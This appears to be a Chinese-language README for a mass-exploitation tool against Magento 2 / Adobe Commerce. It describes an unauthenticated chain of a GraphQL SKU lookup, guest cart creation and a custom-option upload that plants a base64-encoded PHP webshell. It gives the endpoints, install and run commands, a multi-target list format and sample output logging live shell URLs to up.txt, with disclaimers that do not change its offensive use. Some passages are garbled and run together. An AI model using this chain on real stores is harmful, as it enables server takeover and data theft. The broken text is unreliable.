⚠️ 此工具仅用于教育和授权安全测试。未经授权对非您拥有的系统使用本工具属违法行为。
该漏洞利用针对 Magento 2(Adobe Commerce)中的一个严重未认证远程代码执行(RCE)漏洞。通过将 GraphQL 产品查询、访客购物车创建以及通过自定义产品选项上传恶意文件进行链式利用,攻击者可以上传 PHP webshell 并在目标服务器上执行任意代码。
该漏洞允许远程攻击者将一个 PHP 文件写入服务器文件系统,然后访问该文件以执行系统命令、读取/写入文件,并完全入侵 Magento 安装。
Shinday)验证 webshell 是否部署成功up.txt/graphql 获取一个有效的产品 SKU。/rest/default/V1/guest-carts 获取购物车 ID。/rest/default/V1/guest-carts/{cart_id}/items 发送 POST 请求,将 base64 编码的 PHP webshell 作为自定义选项文件上传。/pub/media/custom_options/quote/... 或 /media/custom_options/quote/... 下。Shinday。up.txt。Queue、unicode 以及其他 Python 2 专用模块)requests、urllib3 库安装依赖:
pip install requests urllib3
python exploit.py <list.txt>
<list.txt> – 包含目标基础 URL 的文件(每行一个),可带或不带 http:///https://。https://example.com
http://shop.test
magento2.target.net
up.txt 中。python exploit.py targets.txt
[*] Total targets: 5
[*] Start time: 2025-03-15 12:00:00
[*] Starting 5 threads...
[Thread 1] Processing: https://example.com
[+] SKU : 24-WG080
[+] CART : 8f7c3e9a-1b2f-4d5e-9a8b-7c6d5e4f3a2b
[+] Upload Status : 200
[+] Webshell terpasang: https://example.com/pub/media/custom_options/quote/a1/b2/shell_xyz.php
[✓] Saved to up.txt: https://example.com/pub/media/custom_options/quote/a1/b2/shell_xyz.php
上传的 PHP 文件是一个简单的文件管理器(命名为类似 xxxxx_shin.php),它会以一个基于 Web 的文件浏览器作为响应。其中包含唯一标记 Shinday,脚本使用该标记来验证上传是否成功。
测试完成后请勿在系统上遗留此 shell —— 请立即清理。
/media/custom_options/ 目录以发现异常的 PHP 文件。本软件仅供教育和授权渗透测试使用。作者不对因使用本工具而导致的任何滥用或损害负责。在针对任何目标运行此漏洞利用之前,您必须获得系统所有者的明确书面许可。在大多数司法管辖区,未经授权访问计算机系统属于犯罪行为。
更多免责声明,您可以查看 Jenderal92 主页上的声明。您可以点击 此处 !!! 查看。